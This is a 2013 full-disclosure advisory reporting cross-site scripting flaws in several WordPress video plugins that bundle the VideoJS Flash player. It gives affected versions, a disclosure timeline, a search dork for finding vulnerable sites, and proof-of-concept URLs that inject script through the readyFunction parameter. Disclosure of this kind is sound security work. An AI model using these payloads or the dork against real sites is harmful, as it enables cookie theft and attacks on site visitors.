Hello list!

These are Cross-Site Scripting vulnerabilities in multiple plugins for 
WordPress with VideoJS. Earlier I've wrote about vulnerabilities in VideoJS 
(http://seclists.org/fulldisclosure/2013/May/21). This is popular video and 
audio player, which is used at hundreds thousands of web sites and in 
multiple web applications. Google dork for VideoJS shows 446000 results and 
for WP plugins with it shows 178000 (inurl:video-js.swf 
inurl:wp-content/plugins/).

In addition to plugin VideoJS - HTML5 Video Player for WordPress 
(http://seclists.org/fulldisclosure/2013/May/35), about which I wrote 
earlier, here are new plugins with this player.

Among them are Video Embed & Thumbnail Generator, External "Video for 
Everybody", 1player, S3 Video and EasySqueezePage. But there are other 
vulnerable plugins for WP with video-js.swf (which can be found with 
above-mentioned Google dork). All developers of these plugins, the same as 
developers of all other web applications with VideoJS, need to update it in 
their software.

-------------------------
Affected products:
-------------------------

Video Embed & Thumbnail Generator 4.0.3 and previous versions.
External "Video for Everybody" 2.0 and previous versions.
1player 1.2 and previous versions.
S3 Video 0.97 and previous versions.
EasySqueezePage (all versions).

Vulnerable are web applications which are using VideoJS Flash Component 
3.0.2 and previous versions. Version VideoJS Flash Component 3.0.2 is not 
vulnerable to mentioned XSS hole, except XSS via JS callbacks (as it can be 
read in repository on github). Also there are bypass methods which work in 
the last version, but the developers haven't fixed them due to their low 
impact. So update to last version of VideoJS.swf.

-------------------------
Affected vendors:
-------------------------

Plugins' pages at WordPress plugins catalog:

Video Embed & Thumbnail Generator
http://wordpress.org/extend/plugins/video-embed-thumbnail-generator/
External "Video for Everybody"
http://wordpress.org/extend/plugins/external-video-for-everybody/
1player
http://wordpress.org/extend/plugins/1player/
S3 Video
http://wordpress.org/extend/plugins/s3-video/

----------
Details:
----------

Cross-Site Scripting (WASC-08):

Video Embed & Thumbnail Generator:

http://site/wp-content/plugins/video-embed-thumbnail-generator/video-js/video-js.swf?readyFunction=alert(document.cookie)

External "Video for Everybody":

http://site/wp-content/plugins/external-video-for-everybody/video-js/video-js.swf?readyFunction=alert(document.cookie)

1player:

http://site/wp-content/plugins/1player/players/video-js/video-js.swf?readyFunction=alert(document.cookie)

S3 Video:

http://site/wp-content/plugins/s3-video/misc/video-js.swf?readyFunction=alert(document.cookie)

EasySqueezePage:

http://site/wp-content/plugins/EasySqueezePage/videojs/video-js.swf?readyFunction=alert(document.cookie)

------------
Timeline:
------------ 

2013.02.07 - found XSS vulnerability.
2013.02.08 - informed developers of VideoJS about both vulnerabilities. They 
thanked and promised to fix it.
2013.02.23 - reminded VideoJS developers and asked for date of releasing the 
fix.
2013.03.09 - again reminded developers.
2013.03.26 - again reminded developers.
2013.04.08 - reminded developers on github and resent previous letter to 
Zencoder's developers (since Brightcove, which acquired Zencoder, ignored 
the hole for two months).
2013.04.08-30 - discussed with developers (on github and by e-mail). And 
made my own fix to force developers to fix the hole.
2013.04.30 - developers fixed XSS hole in VideoJS Flash Component 3.0.2 in 
source code on github.
2013.05.02 - developers compiled fixed version of swf (after my reminding) 
and uploaded to both repositories.
2013.05.02 - tested version 3.0.2 and found that developers haven't fixed 
the hole completely and informed them.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua